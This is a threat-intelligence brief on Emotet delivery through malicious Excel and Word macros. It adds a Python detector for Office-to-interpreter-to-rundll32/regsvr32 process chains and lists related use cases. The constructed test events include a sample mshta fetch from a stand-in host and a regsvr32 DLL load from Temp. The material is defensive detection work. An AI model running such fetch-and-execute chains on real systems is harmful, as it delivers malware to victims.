April 26, 2022

Catching Up With Emotet

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed recent Emotet campaigns that deliver the malware through malicious documents using a variety of techniques. Since the botnet's reemergence in November 2021 it has been highly active, although activity has tapered slightly, potentially because Microsoft began disabling Excel 4.0 (XLM) macros by default in January 2022. Analysis of five malicious document samples found Excel and Word documents carrying either a malicious VBA macro or an Excel 4.0 macro to deliver Emotet. When the macro runs, it typically launches wscript, PowerShell, or mshta to download the Emotet payload, a DLL that is then executed with rundll32 or regsvr32.
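The chain above (Office application, then a script interpreter, then rundll32/regsvr32 loading a downloaded DLL) maps directly onto process-creation telemetry. The following is an added example of detection logic written for this page; it is not Fortinet's analysis code or Anvilogic's detection content. It assumes Sysmon Event ID 1 style fields (pid, ppid, image, command line), assumes the dropped DLL lands in a user-writable location such as AppData or Temp (the source does not document exact drop paths), and runs over constructed events, not real telemetry.

```python
"""Detect the Emotet maldoc execution chain over process-creation events.

Added example for this page, not Fortinet's or Anvilogic's code.
Field names follow Sysmon Event ID 1 (assumption); events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Lower-cased image names for the three stages described in the article.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
STAGE1_INTERPRETERS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
STAGE2_LOADERS = {"rundll32.exe", "regsvr32.exe"}
# User-writable drop locations (assumption: the samples' exact paths are not given).
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: Dict[int, ProcEvent], ev: ProcEvent) -> List[ProcEvent]:
    """Walk ppid links upward; stops on a missing parent or a cycle."""
    out: List[ProcEvent] = []
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur and cur.pid not in seen:
        out.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return out


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, Optional[int]]]:
    """Return (rule, pid, office_pid) for each hit.

    Rule 1: an Office application directly spawns a script interpreter.
    Rule 2: rundll32/regsvr32 loads a module from a user-writable path AND
            has an Office application in its ancestry, tying stage 2 back to
            the document. Ancestry is required so that ordinary rundll32 use
            (e.g. control-panel applets) does not fire.
    """
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[str, int, Optional[int]]] = []
    for ev in events:
        name = image_name(ev.image)
        parent = by_pid.get(ev.ppid)
        if parent and image_name(parent.image) in OFFICE_PARENTS and name in STAGE1_INTERPRETERS:
            hits.append(("office_spawns_script_interpreter", ev.pid, parent.pid))
        if name in STAGE2_LOADERS and USER_WRITABLE.search(ev.cmdline):
            office = next((a for a in ancestors(by_pid, ev)
                           if image_name(a.image) in OFFICE_PARENTS), None)
            if office:
                hits.append(("loader_runs_dll_from_user_path", ev.pid, office.pid))
    return hits


# Constructed sample telemetry: one maldoc chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsm'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/stage.hta"),          # stage 1
    ProcEvent(400, 300, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\abc.dll"),  # stage 2
    ProcEvent(500, 100, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),   # benign
    ProcEvent(600, 200, r"C:\Windows\System32\WerFault.exe",
              "WerFault.exe -u -p 200"),                              # benign child of Excel
]

if __name__ == "__main__":
    for rule, pid, office_pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} office_pid={office_pid}")
```

Rule 2 deliberately keys on the loader's ancestry rather than on rundll32 or regsvr32 alone, because both binaries are used constantly by legitimate software; the Office ancestor and the user-writable module path together are what distinguish the maldoc chain. In a real deployment the process tree would be reconstructed from the collector's own parent/child fields or GUIDs rather than raw PIDs, which are reused.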

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line